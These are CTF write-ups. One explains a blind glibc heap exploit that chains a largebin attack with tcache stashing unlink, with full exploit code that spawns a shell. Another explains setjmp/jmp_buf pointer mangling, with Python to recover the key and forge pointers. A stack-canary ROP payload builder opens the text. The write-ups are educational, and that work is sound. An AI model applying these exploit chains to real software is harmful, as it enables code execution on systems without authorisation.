[rbp-0x08] canary (8 bytes)             <-- Fills with real canary
[rbp-0x00] saved RBP (8 bytes)          <-- Fills with stack_l + 0x8
[rbp+0x08] saved RIP (8 bytes)          <-- Fills with one_gadget
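The same payload as a small standalone builder, mainly to check the arithmetic: 72 bytes reach the canary, and the total of 0x60 bytes matches the max_chars value of 0x5f written in the previous step. The function and parameter names are hypothetical stand-ins for canary_l, stack_l + 0x8 and libc_l + 0xef52b.

```python
import struct


def final_payload(canary: int, new_rbp: int, gadget: int) -> bytes:
    """72 null bytes, then the real canary, a fake saved RBP and the one_gadget."""
    # The leading null byte is what ends the echo() loop.
    payload = b"\x00" * 72 + struct.pack("<QQQ", canary, new_rbp, gadget)
    # max_chars was set to 0x5f, so read_stdin() reads exactly 0x5f + 1 bytes
    assert len(payload) == 0x5F + 1
    return payload
```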

House of Fish: TRX CTF 2026

David Hermes — Mon, 27 Apr 2026 00:00:00 GMT

This past weekend, my team and I participated in the TRX 2026 CTF. It was one of the most difficult CTFs this year (so far, at least). Sadly, I skill-issued my way to the end of the 48-hour competition with zero solves. Luckily, my teammates were much more locked in and solved a bunch of challenges. I only managed to solve this blind heap challenge the day after the event ended, but it incorporates some cool techniques that I want to document for myself and for you. Let's start with the code.

chall.c

I added some comments inside the code snippets to make them a little easier to understand. Also notice the complete absence of a read function: as I said before, this is a blind heap challenge, so no leaks.

void create() {
	unsigned int idx;
	unsigned int size;
	void* ptr;
	
	idx = get_idx();   // max 0x100 slots, more than enough...
	size = get_size(); // max 0x500 bytes (gets rounded to the next multiple of 16!!!)
	
	ptr = malloc(size);
	printf("allocated size: %d\n", size);
	
	ptrs[idx] = ptr;
	sizes[idx] = size;
}

void update() {
	unsigned int idx;
	
	idx = get_idx();
	
	printf("enter %d bytes: ", sizes[idx]);
	// this function expects exactly sizes[idx] bytes, no more no less. 
	read_exactly(STDIN_FILENO, ptrs[idx], sizes[idx]);
}

void delete() {
	unsigned int idx;
	
	idx = get_idx();
	free(ptrs[idx]); //use after free vulnerability!
}

void copy() {
	unsigned int dest;
	unsigned int src;
	
	dest = get_idx(); 
	src = get_idx();
	
	// because of the rounding in create() it is not possible to copy 0x8 bytes, only multiples of 16.
	
	memcpy(ptrs[dest], ptrs[src], min(sizes[dest], sizes[src]));
}

//This is one of the menu options, so we only need to write that 8-byte value into *admin
void win() {
	if (*admin == 0xdeadbeefdeadcafe) {
		puts("good boy");
		system("/bin/sh");
	} else 
		die("admin");
}

Did you notice that admin variable? It contains a pointer to a memory area mapped at a fixed address.

admin = (unsigned long*) mmap((void*) 0x1337000, 8, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_FIXED | MAP_ANON, -1, 0);

This is very important because it is the only pointer we know of in the entire binary. Looking at the checksec output confirms this.

blind heap exploitation

We need a way to make malloc() return our admin pointer instead of a normal chunk. This would normally be solved by a tcache poisoning attack, but without a leak we cannot recover the mangling key (I wrote about this key in a past writeup: link). So is it possible to make malloc() return an arbitrary memory location through the tcache without having to deal with the mangling key? Well...
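Assuming the mangling meant here is glibc's safe-linking of tcache next pointers (present since glibc 2.32, and this challenge quotes glibc 2.39 source), the operation is a simple XOR with the storage address shifted right by 12 bits. A sketch of why that blocks a blind poisoning attempt; the heap address below is made up:

```python
def protect_ptr(pos: int, ptr: int) -> int:
    """Safe-linking: mangle a next pointer that is stored at address pos."""
    return (pos >> 12) ^ ptr


def reveal_ptr(pos: int, stored: int) -> int:
    """Undo protect_ptr: XOR with the same value is its own inverse."""
    return (pos >> 12) ^ stored


ADMIN = 0x1337000
heap_slot = 0x55555555A2A0   # made-up address of a freed chunk's next field

# The value we would have to write to point the tcache at admin depends on
# heap_slot >> 12, which we cannot compute without a heap leak.
forged = protect_ptr(heap_slot, ADMIN)
assert reveal_ptr(heap_slot, forged) == ADMIN
```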

tcache stashing unlink attack

This technique abuses a mechanism within the smallbins to move a user-controlled pointer into the tcache without needing to leak the tcache mangling key.

smallbins

Smallbins are circular doubly-linked lists that operate in a FIFO (First-In, First-Out) fashion, unlike the LIFO (Last-In, First-Out) order used by the tcache and fastbins. New chunks are inserted at the head (the front) of the bin and removed from the tail (the back) for allocation. On 64-bit systems, smallbins manage chunks ranging from 0x20 to 0x3F0 bytes. Unlike tcache bins, smallbins have no fixed count limit.

Looking at the smallbin size classes, you can notice an overlap with the tcache sizes. The reason is that each tcache list can store only seven elements. When the tcache is full, the allocator must decide where to store the currently freed chunk. Chunks fitting fastbin sizes (typically 0x20 to 0x80 bytes) are stored in the fastbins. Larger chunks (up to 0x3F0 bytes for smallbins) are first placed into the unsorted bin, and are only sorted into their respective smallbins during a subsequent malloc request.
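A deliberately simplified Python model of that routing on x86-64 with default settings (seven entries per tcache bin, tcache chunks up to 0x410, fastbin chunks up to 0x80). It ignores mmapped chunks, coalescing, the top chunk and every sanity check, and the helper name is hypothetical:

```python
TCACHE_COUNT = 7          # default entries per tcache bin
TCACHE_MAX_CHUNK = 0x410  # largest chunk size held by the default tcache bins
FASTBIN_MAX_CHUNK = 0x80  # default fastbin limit on 64-bit


def free_destination(chunk_size: int, tcache_counts: dict[int, int]) -> str:
    """Very simplified model of where free() puts a chunk."""
    count = tcache_counts.get(chunk_size, 0)
    if chunk_size <= TCACHE_MAX_CHUNK and count < TCACHE_COUNT:
        tcache_counts[chunk_size] = count + 1
        return "tcache"
    if chunk_size <= FASTBIN_MAX_CHUNK:
        return "fastbin"
    return "unsorted"  # sorted into a small/large bin by a later malloc()


counts = {}
dests = [free_destination(0x90, counts) for _ in range(8)]
print(dests.count("tcache"), dests[-1])  # 7 unsorted
```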

tcache stashing

Because we mostly prefer to have our target chunk in the tcache, we can leverage a smallbin mechanism called tcache stashing. Simply put, when a chunk is served from a smallbin (because the matching tcache bin is empty), the requested chunk is returned to the user and the remaining chunks of that smallbin are moved into the tcache until it is full. The major advantage here is that smallbins do not mangle their pointers. Therefore, if we can poison a smallbin chunk, we can move a user-controlled pointer into the tcache without knowing the mangling key.

Let's look at the glibc code that handles the stashing:


// GLIBC 2.39 _int_malloc (https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L3998)

if (in_smallbin_range (nb))
    {
		
		... malloc returns smallbin chunk ...
		
	      /* While bin not empty and tcache not full, copy chunks over.  */
	    while (tcache->counts[tc_idx] < mp_.tcache_count
			&& (tc_victim = last (bin)) != bin) {
			
			//tc_victim is the chunk we want to stash, as you can see we always take the last one from the smallbin.
			
			if (tc_victim != 0)
			{
				bck = tc_victim->bk; //the chunk before the last one.
				set_inuse_bit_at_offset (tc_victim, nb);
				if (av != &main_arena)
					set_non_main_arena (tc_victim);
				bin->bk = bck;   // Vulnerability
				bck->fd = bin;
				tcache_put (tc_victim, tc_idx);
			}
		}
	}

If we poison the bk pointer of a smallbin chunk so that it points to an arbitrary memory area, once the chunk gets stashed, at the next iteration, tc_victim will equal our arbitrary memory pointer.

But the line directly after our vulnerability creates a problem: bck->fd = bin dereferences the value stored in the bk position of our fake chunk. Consequently, it is necessary that the bk field of our fake chunk contains a valid, writable address. This ensures the pointer can be dereferenced without crashing, allowing the execution to successfully reach the tcache_put(my_pointer, tc_idx) function.

We also need to remember that the stashing mechanism will try to move seven chunks into the tcache list. When we poison a smallbin chunk we break the circular linked list, so we need to be careful about which chunk we poison: best practice is to modify the 6th chunk so that our fake admin chunk becomes the seventh.

:::warning This method alone will not work. Our admin memory area is completely empty, so this method would try to dereference a non-existent pointer at admin + 0x08 and immediately crash the program.

bck = tc_victim->bk; // Reads from admin + 0x08 ...
bck->fd = bin;       // Segfaults if bck isn't a valid, writable pointer

But let's imagine, for argument's sake, that there is a pointer there; we will learn later how to move a pointer to that position. :::
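A toy simulation of the stashing loop makes both outcomes visible. Chunks are string labels instead of addresses, the tcache limit is lowered to 2 to keep the trace short, and a missing label stands in for unmapped memory; none of these names come from glibc. Only the chunk returned to the user goes through glibc's "smallbin double linked list corrupted" check, the stashed ones do not, which is what the attack relies on.

```python
BIN = "bin"  # label for the smallbin header inside main_arena


def stash(mem: dict, tcache: list, limit: int) -> list:
    """Simplified model of the smallbin -> tcache stashing loop in _int_malloc.

    mem maps a chunk label to its {"fd", "bk"} fields. Accessing a label that is
    not in mem stands in for touching unmapped memory (a segfault).
    """
    while len(tcache) < limit and mem[BIN]["bk"] != BIN:
        victim = mem[BIN]["bk"]      # tc_victim = last (bin)
        bck = mem[victim]["bk"]      # bck = tc_victim->bk, never validated
        mem[BIN]["bk"] = bck         # bin->bk = bck
        mem[bck]["fd"] = BIN         # bck->fd = bin: needs a writable bck
        tcache.insert(0, victim)     # tcache_put() pushes at the head
    return tcache


def smallbin(admin_plus_8):
    """One real chunk whose bk was poisoned to the fake chunk at admin - 0x10."""
    return {
        BIN: {"fd": "chunk", "bk": "chunk"},
        "chunk": {"fd": BIN, "bk": "fake"},        # poisoned bk
        "fake": {"fd": None, "bk": admin_plus_8},  # bk field = *(admin + 0x08)
        "heap": {"fd": None, "bk": None},          # some writable heap chunk
    }


# With a heap pointer at admin + 0x08 the fake chunk lands in the tcache
print(stash(smallbin("heap"), [], limit=2))   # ['fake', 'chunk']

# With the admin area still zeroed, bck->fd = bin dereferences NULL
try:
    stash(smallbin(0), [], limit=2)
except KeyError:
    print("segfault")
```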

The attack in practice

:::note You can find a more general explanation of this attack in the shellfish how2heap repo: link :::

We can allocate 7 chunks of size 0x90 that will be used to fill the tcache. After that, we allocate 6 chunks of the same size destined for the smallbin list, with a 0x10 guard chunk after each of them so that they do not get coalesced. Then, we free the 7 tcache chunks, followed by the 6 smallbin chunks (but not the guard chunks). The 6 smallbin chunks are placed in the unsorted bin first, so we must then allocate a chunk large enough that it cannot be served from them: this sorts the remaining chunks into the smallbin list.

Now we can edit the bk pointer of the top smallbin chunk (the head of the list), overwriting it with the admin - 0x10 address. After this the bins view changes slightly:

If we now allocate eight 0x90-sized chunks, we would find the admin pointer in the tcache bin! But as I said before, we still need a valid pointer in the fake chunk's bk field (admin + 0x08).

Largebin attack

This attack will help us move a heap pointer into the admin area. It is not really important what kind of pointer we use, as long as it is dereferenceable and the memory it points to is writable. For this we need to understand how largebins work.

Largebins

Largebins follow some of the same basic rules as smallbins: freed chunks are first stored in the unsorted bin and, if they are large enough (0x400 bytes or more on x86-64), they are sorted into the largebins at the next malloc call. They also have the normal fd and bk pointers that maintain the doubly linked list. In largebins, this primary list is sorted in decreasing order of chunk size.

A notable addition is a second circular doubly linked list. For efficiency reasons, different sizes are stored in the same bin (0x400 - 0x43F, 0x440 - 0x47F, etc.). The fd_nextsize and bk_nextsize pointers are used to quickly jump to the right size without having to scan every single chunk; these pointers are only used by the first chunk of each size. To avoid the overhead of rerouting the _nextsize pointers, malloc avoids removing that first chunk when another chunk of the same size is available, and takes the chunk right after it instead.
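To check which bin a given size lands in, here is a Python port of the 64-bit largebin_index_64 macro from glibc's malloc.c (chunk size to bin index). It also confirms that the two chunks used in the exploit below, requests of 0x420 and 0x410 bytes, which become 0x430 and 0x420 byte chunks after adding the 8-byte size field and rounding to 16, share the same largebin:

```python
def largebin_index_64(sz: int) -> int:
    """Python port of glibc's largebin_index_64 macro (chunk size -> bin index)."""
    if (sz >> 6) <= 48:
        return 48 + (sz >> 6)    # 64-byte wide bins: 0x400-0x43F, 0x440-0x47F, ...
    if (sz >> 9) <= 20:
        return 91 + (sz >> 9)
    if (sz >> 12) <= 10:
        return 110 + (sz >> 12)
    if (sz >> 15) <= 4:
        return 119 + (sz >> 15)
    if (sz >> 18) <= 2:
        return 124 + (sz >> 18)
    return 126


print(largebin_index_64(0x430), largebin_index_64(0x420))  # 64 64
```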

Example scenario

When new chunks of an already present size are added, they are inserted right after the head chunk of that size. The diagram below shows that LC3 was the first 0x420 chunk added, making it the head that maintains the _nextsize pointers. When LC4 is sorted in, it is added directly after the head. Likewise, a later LC7 of size 0x420 would be added between LC3 and LC4. When a 0x420 chunk gets malloced, the chunk right after the head is removed: in our example that is LC4 (or LC7, if it had been added).

The attack

The attack consists of writing a heap pointer to an arbitrary address, perfect for the dereferencing problem we have with the tcache stashing unlink attack. The following _int_malloc() code handles sorting a new chunk (victim) into a largebin in the specific case where it is smaller than every chunk already in that bin.

// GLIBC 2.39 _int_malloc https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L4169

victim_index = largebin_index (size);
bck = bin_at (av, victim_index);
fwd = bck->fd;

/* maintain large bins in sorted order */
if (fwd != bck) {

    ... stuff ...
    
    /* if smaller than smallest, bypass loop below */
    assert (chunk_main_arena (bck->bk));
    if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)) {
        fwd = bck; //the bin
        bck = bck->bk; //last chunk
        
        victim->fd_nextsize = fwd->fd; //the biggest head chunk
        
        victim->bk_nextsize = fwd->fd->bk_nextsize; // !!!
        fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; // !!!
        //  the line above can be rewritten as
        //  fwd->fd->bk_nextsize = victim;
        //  victim->bk_nextsize->fd_nextsize = victim;
    }
    else
    {
	    ... stuff ...

I marked the important lines with some exclamation marks. Let's imagine we have a big chunk in the largebin, and we are currently moving a smaller one into the same largebin. If we poison the bk_nextsize of the large chunk with another writable address, for example admin, this code becomes:

victim->bk_nextsize = admin; //admin gets stored in bk_nextsize of our victim.
fwd->fd->bk_nextsize = victim; //not important
victim->bk_nextsize->fd_nextsize = victim; //we store a pointer to victim inside the fd_nextsize of admin (admin+0x20)

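Knowing this, we simply poison the large chunk's bk_nextsize with admin - 0x18, so that victim->bk_nextsize = admin - 0x18. This way the pointer to victim is stored at admin - 0x18 + 0x20 = admin + 0x08, exactly the bk position of the fake chunk used in the stashing unlink attack.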
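The offsets can be checked with a few lines of Python, assuming the standard x86-64 malloc_chunk layout (prev_size, size, fd, bk, fd_nextsize, bk_nextsize, 8 bytes each):

```python
# x86-64 malloc_chunk field offsets, relative to the chunk start
PREV_SIZE, SIZE, FD, BK, FD_NEXTSIZE, BK_NEXTSIZE = 0x00, 0x08, 0x10, 0x18, 0x20, 0x28

ADMIN = 0x1337000               # fixed mmap address from the challenge

# Largebin attack: victim->bk_nextsize->fd_nextsize = victim
poisoned_bk_nextsize = ADMIN - 0x18
largebin_write = poisoned_bk_nextsize + FD_NEXTSIZE

# Stashing unlink: the fake chunk sits at admin - 0x10, bck is read from its bk
fake_chunk = ADMIN - 0x10
stash_read = fake_chunk + BK
user_ptr = fake_chunk + FD      # chunk2mem(): what malloc() later returns

print(hex(largebin_write), hex(stash_read))  # 0x1337008 0x1337008
assert largebin_write == stash_read == ADMIN + 0x08
assert user_ptr == ADMIN
```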

:::note You can find a more general explanation of this attack in the shellfish how2heap repo: link :::

Exploit goes brrr

Now that we understand how the two vulnerabilities work, we can chain them. We need to be careful to not break anything, let's start with the largebin part:

    create(r, 1, 0x420) #Big one, we want to poison this one
    create(r, 2, 0x10)  #Guard
    create(r, 3, 0x410) #Small one, our victim
    create(r, 0, 0x10)  #Guard
    
    #Deleting chunk and allocating bigger chunk to move it to largebins
    delete(r, 1)        
    create(r, 0, 0x4a0)
    
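    #Poisoning the large chunk without a leak:
    #save its fd/bk (libc pointers) into guard chunk 2 (copy moves 0x10 bytes),
    copy(r, 2, 1)
    #set fd_nextsize = 0 and bk_nextsize = admin-0x18 (the "A"s clobber fd/bk),
    update(r, 1, b"A"*0x10 + p64(0) + p64(admin-0x18) + b"B"*0x400)
    #then restore the original fd/bk from the guard chunk
    copy(r, 1, 2)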
    
    #Deleting the small one
    delete(r, 3)
    create(r, 0, 0x4a0)
    
    #Cleaning the heap because we are good citizens
    create(r, 0, 0x400)
    create(r, 0, 0x3e0)
    create(r, 0, 0x30)

The last part helps remove trash from the freelists. Now there should be a heap pointer in the admin area, at admin + 0x08.

After this, the stage is prepared for our smallbin shenanigans.

    #creating 7 tcache chunks
    for a in range(4, 11):
        create(r, a, 0x90)
    
    #creating 6 smallbin chunks + guards
    for a in range(11, 17):
        create(r, a, 0x90)
        create(r, 0, 0x10) #guard
       
    #populating tcache and smallbins
    for a in range(4, 17):
        delete(r, a)
    create(r, 0, 0x400)
    
    #Poisoning the last smallbin added (head of the list)
    update(r, 16, p64(0) + p64(admin-0x10) + b"B"*0x80)
    
    #Removing the tcache bins
    for a in range(7):
        create(r, 0, 0x90)
       
    #Triggering stash unlink
    create(r, 0, 0x90)

Looking in the bins we should see our chunk in the tcache list ready to be used.

The rest is easy. By allocating two chunks and writing into the second one, we can modify the admin area and write the required value (0xdeadbeefdeadcafe); triggering the win() menu option then gives us a shell and the flag.

setjmp: jmp_buf exploitation

David Hermes — Fri, 29 May 2026 00:00:00 GMT

I participated in the TeamItaly.IT quals this weekend, the Italian pre-qualification CTF for the national team. One of the challenges centered around the setjmp() and longjmp() libc functions. I couldn't find many resources explaining their internals in a CTF context, so here is a short post on this fun technique.

setjmp and longjmp

While a standard goto can only jump within the same function, the setjmp and longjmp combo acts as a non-local goto.

setjmp stores the state of the callee-saved registers (RBX, RBP, R12-R15), the stack pointer, and the instruction pointer into a buffer, and then returns zero. When longjmp is subsequently called, the registers are restored from the buffer. setjmp saves its own return address as the instruction pointer, which means that longjmp jumps to just after the setjmp call; additionally, it makes that setjmp call appear to return (in rax) the val argument passed to longjmp (or 1 if val is 0).

 #include <setjmp.h>
 int setjmp(jmp_buf env); //returns 0 when called directly
 void longjmp(jmp_buf env, int val);

jmp_buf

So, how does setjmp exactly save our registers? Well, looking into the libc implementation, we find this interesting typedef:

//glibc https://elixir.bootlin.com/glibc/glibc-2.43.9000/source/setjmp/setjmp.h#L36
typedef struct __jmp_buf_tag jmp_buf[1];

jmp_buf is defined as an array of only one element of type __jmp_buf_tag. This is cool because when an array is passed in a function call, it "decays" into a pointer. Without this trick, we would need to prepend an & in front of the argument. Let's look at __jmp_buf_tag now:

//glibc https://elixir.bootlin.com/glibc/glibc-2.43.9000/source/setjmp/bits/types/struct___jmp_buf_tag.h#L26
/* Calling environment, plus possibly a saved signal mask.  */
struct __jmp_buf_tag
{
	__jmp_buf __jmpbuf;		/* Calling environment.  */
	int __mask_was_saved;	/* Saved the signal mask?  */
	__sigset_t __saved_mask;	/* Saved signal mask.  */
};

This struct doesn't really tell us much. Why are we now reading the word signal? Well, there is a variation of setjmp called sigsetjmp (along with siglongjmp) that also saves the signal mask into the buffer.

So for our case, only the first element of __jmp_buf_tag is interesting. Let's look at it:

```c
//glibc https://elixir.bootlin.com/glibc/glibc-2.43.9000/source/sysdeps/x86/bits/setjmp.h#L31
typedef long int __jmp_buf[8];
```

It's literally an array of eight 64-bit integers (long int is 64 bits on x86-64), nothing special. To understand how the values are stored inside this array, it is easier to look through a debugger than to dig through the many architecture-specific implementations of setjmp. On x86-64, __jmp_buf[8] has this layout:

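| Index | `__jmp_buf[8]` entry | Mangled? |
|---|---|---|
| 0 | `RBX` | no |
| 1 | `RBP` | yes |
| 2 | `R12` | no |
| 3 | `R13` | no |
| 4 | `R14` | no |
| 5 | `R15` | no |
| 6 | `RSP` | yes |
| 7 | `RIP` | yes |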
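When a challenge leaks the contents of a jmp_buf, it helps to give the slots names. Below is a minimal sketch that assumes we already hold the raw leaked bytes. How those bytes get leaked depends entirely on the challenge, and `parse_jmpbuf`, `SLOTS` and `MANGLED` are hypothetical names chosen for illustration.

```python
import struct

# Slot order of __jmp_buf on x86-64 glibc, as in the layout table
SLOTS = ["rbx", "rbp", "r12", "r13", "r14", "r15", "rsp", "rip"]
# These three slots are stored mangled and must be demangled before use
MANGLED = {"rbp", "rsp", "rip"}

def parse_jmpbuf(raw: bytes) -> dict:
    """Split the first 64 bytes of a leaked jmp_buf into named little-endian qwords."""
    if len(raw) < 64:
        raise ValueError("need at least 64 bytes of jmp_buf")
    values = struct.unpack("<8Q", raw[:64])
    return dict(zip(SLOTS, values))

if __name__ == "__main__":
    leak = bytes(range(64))  # stand-in for real leaked bytes
    for reg, value in parse_jmpbuf(leak).items():
        tag = " (mangled)" if reg in MANGLED else ""
        print(f"{reg}: {value:#018x}{tag}")
```

The plain slots (RBX, R12-R15) can be read and overwritten directly. The mangled ones still need the key, which is what the rest of the post is about.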

Wait, what does mangled mean? Well, let's look at this example of a __jmp_buf[8] struct:

As you can see, RBP, RSP, and RIP should all be addresses, but their values have been mangled. This means we cannot simply overwrite them with a new address to control these registers. We first have to undo the mangling.

breaking the mangling

By setting a breakpoint in the __longjmp function in GDB, it is possible to understand exactly how the function demangles the pointers.

It first rotates the value right by 17 bits (ror 0x11), and then XORs the result with a secret key taken from the Thread Control Block at offset 0x30 (fs:0x30).
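These two steps translate directly into Python. The sketch below implements the 64-bit rotation by hand instead of relying on pwntools, so it runs on its own. `demangle` and `ror64` are illustrative names, and `key` stands for the qword at fs:0x30, which we don't know yet at this point.

```python
MASK64 = (1 << 64) - 1

def ror64(value: int, shift: int) -> int:
    """Rotate a 64-bit value right by `shift` bits."""
    shift %= 64
    return ((value >> shift) | (value << (64 - shift))) & MASK64

def demangle(mangled: int, key: int) -> int:
    """Mirror __longjmp: rotate right by 0x11, then XOR with the pointer guard (fs:0x30)."""
    return ror64(mangled, 0x11) ^ key
```

The order matters: the rotation is undone first, and only then is the key XORed out.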

:::note When a process starts, two qwords of random data are stored in the Thread Control Block (TCB). The first qword is used as the stack canary (fs:0x28), and the second is used for pointer mangling (fs:0x30). The exit_funcs are mangled with the same key as setjmp (link to an old writeup). :::

This means that if we can leak the mangled RIP from a jmp_buf and we know the real address it encodes (the address right after the setjmp call), we can recover the key:

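```python
from pwn import ror  # pwntools: ror(n, k, word_size)

def recover_key(mangled_addr: int, real_addr: int) -> int:
    # undo the 17-bit rotation, then XOR out the known pointer to isolate fs:0x30
    return ror(mangled_addr, 0x11, 64) ^ real_addr
```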

Once we have the key, we can mangle an arbitrary pointer by reversing the demangling steps: XOR with the key first, then rotate left by 17 bits:

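```python
from pwn import rol  # pwntools: rol(n, k, word_size)

def mangle_addr(real_addr: int, key: int) -> int:
    # same order as glibc's PTR_MANGLE: XOR with the key, then rotate left by 17 bits
    return rol(real_addr ^ key, 0x11, 64)
```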
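To check that the two helpers are consistent with each other, here is a self-contained round trip. Hand-written rotations stand in for pwntools' rol/ror. All values are made up: a fake pointer guard, a fake setjmp return address in a non-PIE binary, and a hypothetical target address. In a real exploit, the leaked value and the return address come from the challenge.

```python
MASK64 = (1 << 64) - 1

def rol64(value: int, shift: int) -> int:
    shift %= 64
    return ((value << shift) | (value >> (64 - shift))) & MASK64

def ror64(value: int, shift: int) -> int:
    return rol64(value, (64 - shift) % 64)

def mangle(ptr: int, key: int) -> int:
    return rol64(ptr ^ key, 0x11)          # XOR, then rotate left

def demangle(mangled: int, key: int) -> int:
    return ror64(mangled, 0x11) ^ key      # rotate right, then XOR

def recover_key(mangled: int, real: int) -> int:
    return ror64(mangled, 0x11) ^ real     # known plaintext reveals the key

# Hypothetical values standing in for a real leak
secret_key = 0x8A3F5C2D1E4B6A79            # pretend fs:0x30
ret_addr = 0x401337                        # pretend address right after setjmp
leaked_rip = mangle(ret_addr, secret_key)  # what slot 7 of the jmp_buf would hold

key = recover_key(leaked_rip, ret_addr)
assert key == secret_key

target = 0x401500                          # hypothetical address we want longjmp to land on
forged = mangle(target, key)
assert demangle(forged, key) == target
print(hex(key), hex(forged))
```

In an actual exploit, a value like `forged` would be written over the RIP slot (and, if a stack pivot is needed, the RSP/RBP slots) before longjmp is triggered.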

CTF challenges

If you want to try this technique yourself, here are some challenges that use it:

txvm (TeamItaly 2026 Quals): waiting for release
